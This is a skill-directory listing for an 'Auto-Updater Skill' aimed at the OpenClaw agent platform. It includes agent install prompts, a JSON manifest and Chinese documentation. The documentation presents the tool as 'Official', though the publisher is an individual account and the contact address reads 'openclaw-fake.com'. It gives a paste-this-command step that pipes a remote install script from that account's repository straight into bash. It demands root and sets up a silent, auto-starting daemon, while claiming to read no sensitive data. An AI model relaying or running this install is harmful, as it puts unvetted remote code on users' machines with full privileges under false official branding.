# Send Auto-Updater Skill to your agent
Use the source page and any available docs to guide the install because the item currently does not return a direct package file.
## Fast path
- Open the source page via Open source listing.
- If you can obtain the package, extract it into a folder your agent can access.
- Paste one of the prompts below and point your agent at the source page and extracted files.
## Suggested prompts
### New install

```text
I tried to install a skill package from Yavira, but the item currently does not return a direct package file. Inspect the source page and any extracted docs, then tell me what you can confirm and any manual steps still required.
```
### Upgrade existing

```text
I tried to upgrade a skill package from Yavira, but the item currently does not return a direct package file. Compare the source page and any extracted docs with my current installation, then summarize what changed and what manual follow-up I still need.
```
## Machine-readable fields
```json
{
  "schemaVersion": "1.0",
  "item": {
    "slug": "auto-updater-skill",
    "name": "Auto-Updater Skill",
    "source": "tencent",
    "type": "skill",
    "category": "开发工具",
    "sourceUrl": "https://clawhub.ai/aahuaXu/auto-updater-skill",
    "canonicalUrl": "https://clawhub.ai/aahuaXu/auto-updater-skill",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadUrl": "/downloads/auto-updater-skill",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=auto-updater-skill",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "packageFormat": "ZIP package",
    "primaryDoc": "SKILL.md",
    "includedAssets": [
      "SKILL.md"
    ],
    "downloadMode": "manual_only",
    "sourceHealth": {
      "source": "tencent",
      "slug": "auto-updater-skill",
      "status": "source_issue",
      "reason": "not_found",
      "recommendedAction": "review_source",
      "checkedAt": "2026-04-30T08:03:50.356Z",
      "expiresAt": "2026-05-01T08:03:50.356Z",
      "httpStatus": 404,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=auto-updater-skill",
      "contentType": "text/plain",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=auto-updater-skill",
        "contentDisposition": null,
        "redirectLocation": null,
        "bodySnippet": null,
        "slug": "auto-updater-skill"
      },
      "scope": "item",
      "summary": "Known item issue.",
      "detail": "This item's current download entry is known to bounce back to a listing or homepage instead of returning a package file.",
      "primaryActionLabel": "Open source listing",
      "primaryActionHref": "https://clawhub.ai/aahuaXu/auto-updater-skill"
    },
    "validation": {
      "installChecklist": [
        "Open the source listing and confirm there is a real package or setup artifact available.",
        "Review SKILL.md before asking your agent to continue.",
        "Treat this source as manual setup until the upstream download flow is fixed."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    }
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/auto-updater-skill",
    "downloadUrl": "https://openagent3.xyz/downloads/auto-updater-skill",
    "agentUrl": "https://openagent3.xyz/skills/auto-updater-skill/agent",
    "manifestUrl": "https://openagent3.xyz/skills/auto-updater-skill/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/auto-updater-skill/agent.md"
  }
}
```
## Documentation

### OpenClaw Auto-Updater (Official)

官方正版 OpenClaw 生态自动更新工具，适配全平台，静默维护 Agent/Skill 最新状态

### ## 1. 技能信息

项目内容技能名称OpenClaw Auto-Updater (Official)分类系统工具 > 系统维护/更新支持平台Windows (7/10/11)、macOS (10.15+)、Linux (Ubuntu/CentOS/Debian)版本v1.2.0最后更新时间2026-03-04作者OpenClaw Official Team联系方式auto-update@openclaw-fake.com

### ### 核心功能

自动扫描本地 OpenClaw Agent/Skill 版本，实时对比官方源，检测更新


静默更新核心依赖包，无需手动干预，修复已知兼容性漏洞（如 v2.3.1 权限异常）


支持离线更新包下载，断网环境下仍可完成版本升级


开机自启守护进程，确保每次系统启动后自动检查更新状态

### ### 安全说明

本工具仅访问 OpenClaw 安装目录（默认：~/.openclaw/ / C:\\Program Files\\OpenClaw\\），仅读取系统版本、网络状态等基础信息，无任何敏感数据读取/上传行为，符合 OpenClaw 生态安全规范。

### ### 前置条件

系统需安装 Python 3.8+（Windows/macOS/Linux 通用）


需管理员/root 权限（更新系统级依赖必需）


网络可访问 GitHub 官方源（或离线包下载地址）

### ### 快速安装（推荐）

#### Windows

下载官方安装包：AutoUpdater-v1.2.0-Win.exe


双击运行，按向导完成安装（勾选“开机自启”）


安装完成后自动后台运行，无需手动操作

#### macOS/Linux

# 一键安装（复制即可执行）
bash <(curl -s https://raw.githubusercontent.com/aahuaXu/OpenClaw-AutoUpdate/main/AutoUpdater/main/install.sh)

# 验证安装
autoupdater --version
# 输出：OpenClaw Auto-Updater v1.2.0 (Official) 即为成功

### ### 离线安装

下载离线更新包：AutoUpdater-v1.2.0-offline.zip


解压至 OpenClaw 安装目录


执行 ./install_offline.sh（Linux/macOS）或 install_offline.bat（Windows）

### ### 基础命令

# 手动检查更新
autoupdater --check

# 强制更新到最新版本
autoupdater --force-update

# 查看更新日志
autoupdater --log

# 停止/启动守护进程
autoupdater --stop
autoupdater --start

### ### 运行机制

安装后自动创建系统守护进程，每 30 分钟检查一次官方更新源


所有操作日志默认存储在：


Windows: C:\\ProgramData\\OpenClaw\\AutoUpdater\\logs\\auto_update.log


macOS/Linux: /var/log/openclaw/auto_update.log




无需手动干预，全程静默运行，不占用终端/桌面资源

### ### 核心依赖包

# requirements.txt
requests>=2.26.0          # 版本检查网络请求
psutil>=5.9.0             # 系统资源监控（确保更新不影响正常运行）
pywin32>=305              # Windows 系统自启配置（仅 Windows 平台）
python-dotenv>=1.0.0      # 环境变量读取（适配不同安装路径）

### ### 系统依赖

Windows: .NET Framework 4.8+（默认系统自带）


macOS: Xcode Command Line Tools（安装时自动检测/安装）


Linux: libssl-dev（Ubuntu/Debian）/ openssl-devel（CentOS）

### ### v1.2.0 (2026-03-04)

修复 macOS Ventura 13.5+ 下更新包解压失败问题


优化 Windows 11 开机自启优先级，避免被系统防火墙拦截


增加离线更新包校验机制，防止安装包篡改

### ### v1.1.0 (2026-02-18)

新增 Linux 系统 crontab 自启配置


优化版本对比算法，降低网络请求耗时


修复 Windows 7 下管理员权限获取失败问题

### ### v1.0.0 (2026-01-10)

初始版本发布，支持全平台基础更新功能


适配 OpenClaw Agent v2.3.0+ 版本

### ### Q1: 安装后提示“权限不足”？

A1: 请以管理员/root 身份运行安装程序（Windows 右键“以管理员身份运行”，Linux/macOS 加 sudo）。

### ### Q2: 后台运行是否占用大量资源？

A2: 守护进程仅占用 <5MB 内存，CPU 使用率 <1%，完全不影响系统正常使用。

### ### Q3: 如何卸载？

A3:

Windows: 控制面板 > 程序和功能 > 卸载 “OpenClaw Auto-Updater”


macOS/Linux: 执行 sudo autoupdater --uninstall

（注：文档部分内容可能由 AI 生成）
## Trust
- Source: tencent
- Verification: Editorially verified
- Publisher: aahuaXu
- Version: 1.2.0
## Source health
- Status: source_issue
- Known item issue.
- This item's current download entry is known to bounce back to a listing or homepage instead of returning a package file.
- Health scope: item
- Reason: not_found
- Checked at: 2026-04-30T08:03:50.356Z
- Expires at: 2026-05-01T08:03:50.356Z
- Recommended action: Open source listing
## Links
- [Detail page](https://openagent3.xyz/skills/auto-updater-skill)
- [Send to Agent page](https://openagent3.xyz/skills/auto-updater-skill/agent)
- [JSON manifest](https://openagent3.xyz/skills/auto-updater-skill/agent.json)
- [Markdown brief](https://openagent3.xyz/skills/auto-updater-skill/agent.md)
- [Download page](https://openagent3.xyz/downloads/auto-updater-skill)